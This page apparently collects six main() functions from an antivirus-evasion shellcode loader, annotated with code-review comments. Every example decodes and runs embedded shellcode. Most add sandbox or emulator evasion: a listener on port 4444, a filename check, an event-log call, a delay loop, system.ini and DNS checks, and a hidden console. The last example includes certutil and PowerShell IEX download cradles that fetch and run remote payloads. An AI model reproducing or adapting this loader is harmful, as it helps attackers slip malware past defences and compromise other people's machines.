Exemple #1
/* Example #1: minimal loader stub. Decodes the byte string in `buffer` via
 * decode_shellcode() and passes the result to exec_shellcode(); both helpers
 * are defined elsewhere (not on this page). argc/argv are unused. */
int main (int argc, char **argv)
{
	unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
	unsigned char buffer[]="the encoded shellcode here";	// placeholder text standing in for the payload

	int size = sizeof(buffer);	// array size, so this counts the trailing '\0' as well

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
	// no return statement: relies on C99's implicit `return 0` from main
}
Exemple #2
/* Example #2: the same loader stub as Example #1, gated behind a one-shot
 * Winsock server. The process binds TCP port 4444 on all interfaces, blocks
 * in accept() until a client connects, sends a greeting, tears the connection
 * down and only then decodes and runs the payload. From a monitoring point of
 * view the listening socket and the banner are the observable side effects
 * that precede any payload activity. */
int main (int argc, char **argv)
{
	//unsigned char *buffer;
	unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
	unsigned char buffer[]=	"encrypted shellcode";	// placeholder text standing in for the payload

	WSADATA WsaDat;
	if(WSAStartup(MAKEWORD(2,2),&WsaDat)!=0)
	{
		WSACleanup();
		return 0;
	}
	
	SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if(Socket==INVALID_SOCKET)
	{
		WSACleanup();
		return 0;
	}
	
	SOCKADDR_IN serverInf;
	serverInf.sin_family=AF_INET;
	serverInf.sin_addr.s_addr=INADDR_ANY;	// accept connections on every local interface
	serverInf.sin_port=htons(4444);

	if(bind(Socket,(SOCKADDR*)(&serverInf),sizeof(serverInf))==SOCKET_ERROR)
	{
		WSACleanup();
		return 0;
	}

	listen(Socket,1);	// NOTE(review): return value unchecked

	SOCKET TempSock=SOCKET_ERROR;
	while(TempSock==SOCKET_ERROR)
	{
		TempSock=accept(Socket,NULL,NULL);	// spins on accept() failures until one client connects
	}
	Socket=TempSock;	// NOTE(review): the listening socket is overwritten without an explicit closesocket()

	char *szMessage="Welcome to the server!\r\n";
	send(Socket,szMessage,strlen(szMessage),0);	// banner to the connected client; return value unchecked

	shutdown(Socket,SD_SEND);

	closesocket(Socket);

	WSACleanup();


	int size = sizeof(buffer);	// array size, so this counts the trailing '\0' as well

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
	// no return statement: relies on C99's implicit `return 0` from main
}
Exemple #3
/* Example #3: the payload is decoded and run only when the program's own
 * invocation name (argv[0]) contains "strstr.exe"; otherwise main does nothing.
 * decode_shellcode()/exec_shellcode() are defined elsewhere (not on this page). */
int main (int argc, char **argv)
{
	unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
	unsigned char buffer[]= "strstr.c";	// placeholder text standing in for the payload

 	// NOTE(review): strstr() returns a pointer; comparing it with `> 0` rather than
 	// `!= NULL` is not valid C, and argv[0] may be NULL when argc == 0.
 	if(strstr(argv[0], "strstr.exe") > 0)
	{
		int size = sizeof(buffer);	// array size, so this counts the trailing '\0' as well

		shellcode = decode_shellcode(buffer,shellcode,size);
		exec_shellcode(shellcode);
	}
	// no return statement: relies on C99's implicit `return 0` from main
}
Exemple #4
/* Example #4: opens the local "Application" event log with OpenEventLog()
 * before the usual decode/exec sequence. The handle is only tested for NULL;
 * whether the call succeeds or not, the payload path below still runs, and
 * the handle is never released with CloseEventLog(). */
int main (int argc, char **argv)
{
	unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
	unsigned char buffer[]= "encoded shellcode";	// placeholder text standing in for the payload

  HANDLE h;
  h = OpenEventLog( NULL, "Application");	// NULL server name = local machine
  if (h == NULL)
	  printf("error\n");	// failure is reported but not acted on

	int size = sizeof(buffer);	// array size, so this counts the trailing '\0' as well

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
	// no return statement: relies on C99's implicit `return 0` from main
}
Exemple #5
/* Example #5: burns time in a ~10^8-iteration nested loop of trig calls whose
 * results are discarded, then runs the usual decode/exec sequence. The loop
 * has no effect other than elapsed CPU time; since a, b, c and d are never
 * read, an optimizing compiler may drop it entirely. */
int main (int argc, char **argv)
{
	//unsigned char *buffer;
	unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
	unsigned char buffer[]= "encoded shellcode";	// placeholder text standing in for the payload

	int x,y;
	for (x=1; x<10000; x++)
	{
		for (y=1; y<10000; y++)
		{
			int a=cos(x);	// double truncated to int; value never used
			int b=cos(y);	// double truncated to int; value never used
			double c=sin(x);	// never used
			double d=sin(y);	// never used
		}
	}


	int size = sizeof(buffer);	// array size, so this counts the trailing '\0' as well

	shellcode = decode_shellcode(buffer,shellcode,size);
	exec_shellcode(shellcode);
	// no return statement: relies on C99's implicit `return 0` from main
}
Exemple #6
/* Example #6: build-time configurable loader. Every behaviour is selected by
 * a preprocessor symbol (supplied by a defs.h, per the comment further down):
 *   QUIET                hide the console window
 *   SANDBOX_FOPEN        exit unless c:\windows\system.ini can be opened
 *   KVALUE               exit if gethostbyname(KVALUE) resolves
 *   DOWNLOADCERTUTIL /
 *   DOWNLOADPOWERSHELL   spawn certutil.exe / powershell.exe via system() using argv[2]
 *   LVALUE               read the payload from the file named in argv[1]
 *   FVALUE / UVALUE      payload text / download URL baked in at compile time
 *   ENCRYPT              run decode_shellcode() before execution
 *   X64 / ASCIIMSF       select exec_shellcode64() / exec_shellcode_ASCIIMSF()
 *   DOWNLOADEXECSC       fetch the payload with downloadshellcode(argv[1])
 *   PRINT_DEBUG          verbose printf() tracing
 * The helpers (get_filesize, load_textfile, ie_download, downloadshellcode,
 * decode_shellcode, exec_shellcode*) are defined elsewhere, not on this page.
 * Several symbol combinations do not compile or are memory-unsafe; see the
 * NOTE(review) comments inline. */
int main (int argc, char **argv)
{
	#ifdef QUIET
		ShowWindow(GetConsoleWindow(), SW_HIDE);	// hide the process's own console window
	#endif
		
	char *fvalue = NULL;	// payload file path (LVALUE) or compiled-in payload copy (FVALUE)
	char *uvalue = NULL;	// compiled-in download URL copy (UVALUE)

	int index;
	int c;	// NOTE(review): never used

	opterr = 0;	// NOTE(review): getopt state (opterr/optind) is touched, but no getopt() call is visible here

	// do evading here with fopen technique
	#ifdef SANDBOX_FOPEN
		#ifdef PRINT_DEBUG
		printf("use fopen sandbox escape\n");
		#endif
		FILE *fp = fopen("c:\\windows\\system.ini", "rb");	// exits quietly if this file cannot be opened
		if (fp == NULL)
			return 0;
		fclose(fp);
	#endif

	//evading with gethostbyname technique
	#ifdef KVALUE
		#ifdef PRINT_DEBUG
		printf("use  gethostbyname sandbox evasion\n");
		#endif
		struct hostent *hp = gethostbyname(KVALUE);	// emits a name lookup for KVALUE
		if (hp != NULL) 		
			exit(0);	// execution continues only when the name does NOT resolve

	#endif

//#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL)
//download a file and write to disk
#ifdef DOWNLOADCERTUTIL
	char download[500];  //how not to do it...
	// NOTE(review): argc is never checked and sprintf() is unbounded, so a long argv[2]
	// overruns `download` on the stack; the resulting string is then passed to system().
	sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]);
	#ifdef PRINT_DEBUG
		printf("url: %s\n", download);
	#endif
	system(download);	// spawns a child certutil.exe process
	#ifdef PRINT_DEBUG
		printf("download done\n");
	#endif
#endif

#ifdef DOWNLOADPOWERSHELL
	char download[500];	// NOTE(review): redeclaration error if DOWNLOADCERTUTIL is also defined
	// NOTE(review): same unbounded sprintf() from an unchecked argv[2] as above
	sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]);
	#ifdef PRINT_DEBUG
		printf("url: %s\n", download);
	#endif
	system(download);	// spawns a child powershell.exe process
#endif

	#ifdef LVALUE
		fvalue=argv[1];	// NOTE(review): argc is not checked before indexing argv
	#endif

	#ifdef PRINT_DEBUG
		printf ("fvalue = %s ", fvalue);	// NOTE(review): %s with a NULL pointer is undefined behaviour
		printf ("uvalue = %s \n", uvalue);
		for (index = optind; index < argc; index++)
			printf ("Non-option argument %s\n", argv[index]);
	#endif

// compute #defines from defs.h
#ifdef FVALUE
	int size = strlen(FVALUE);
	fvalue=(char*)malloc(size);	// NOTE(review): one byte short — strcpy() also writes the terminator
	strcpy(fvalue,FVALUE);
#endif

#ifdef UVALUE
	int size = strlen(UVALUE);	// NOTE(review): redeclares `size` if FVALUE is also defined
	uvalue=(char*)malloc(size);	// NOTE(review): same off-by-one as the FVALUE case
	strcpy(uvalue,UVALUE);
#endif

	// exec shellcode from a given file or from defs.h
	if (fvalue)
	{
		unsigned char *buffer;	// NOTE(review): passed to load_textfile() before it is ever assigned
		unsigned char *shellcode;	// NOTE(review): passed to decode_shellcode() before it is ever assigned
		int size;	// shadows the FVALUE/UVALUE `size` declared above
//#ifndef FVALUE
#ifdef LVALUE
	#ifdef PRINT_DEBUG
		printf("exec shellcode from file\n");
	#endif
		size = get_filesize(fvalue);
		buffer = load_textfile(fvalue, buffer, size);
#endif
	#ifdef FVALUE
		size = strlen (FVALUE);	// stops at the first NUL byte — presumably FVALUE is a text encoding; verify
		buffer = FVALUE;	// string literal assigned to a non-const unsigned char *
	#endif

	#ifdef ENCRYPT 
		#ifdef PRINT_DEBUG
		printf ("size %d\n",size);
		//printf ("%s\n",FVALUE);
		printf("exec shellcode with decode_shellcode\n");
		#endif
		shellcode = decode_shellcode(buffer,shellcode,size);
	#endif

	#ifndef ENCRYPT
		#ifdef LVALUE
		unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l
		#endif
	#ifndef ASCIIMSF 
	#ifndef DOWNLOADEXECSC
		#ifdef PRINT_DEBUG
		printf("exec shellcode without decode_shellcode\n");
		#endif
		shellcode = buf;	// NOTE(review): `buf` exists only under LVALUE, so !ENCRYPT without LVALUE does not compile
	#endif
	#endif
	#endif

	#ifndef X64 
	#ifndef ASCIIMSF
		exec_shellcode(shellcode);
	#endif
	#ifdef ASCIIMSF
		exec_shellcode_ASCIIMSF(shellcode);
	#endif
	#endif
	#ifdef X64
		exec_shellcode64(shellcode);
	#endif
	}
	// exec from url
#ifdef UVALUE
	else if (uvalue)
	{
		#ifdef PRINT_DEBUG
			printf("exec shellcode from url\n");
		#endif

		char *sh_filename;	// NOTE(review): passed to ie_download() before it is ever assigned
		sh_filename = ie_download(uvalue, sh_filename);
		int x=strlen(sh_filename);	// only consumed by the debug print below
		
#ifdef PRINT_DEBUG	
		printf("\n\n%d\n\n", x);
#endif

		unsigned char *buffer;	// NOTE(review): passed to load_textfile() before it is ever assigned
		unsigned char *shellcode;

		int size = get_filesize(sh_filename);
		buffer = load_textfile(sh_filename, buffer, size);
#ifdef ENCRYPT
		shellcode = decode_shellcode(buffer,shellcode,size);
#else
		shellcode = buf;	// NOTE(review): `buf` is scoped to the if-block above, so this branch does not compile
#endif
#ifndef X64 
		exec_shellcode(shellcode);
#endif
#ifdef X64
		exec_shellcode64(shellcode);
#endif
	}
#endif

#ifdef DOWNLOADEXECSC
	unsigned char *shellcode = downloadshellcode(argv[1]);	// NOTE(review): argc is not checked before indexing argv
#ifndef X64
	exec_shellcode(shellcode);
#endif
#ifdef X64
	exec_shellcode64(shellcode);
#endif
#endif

	return 0;
}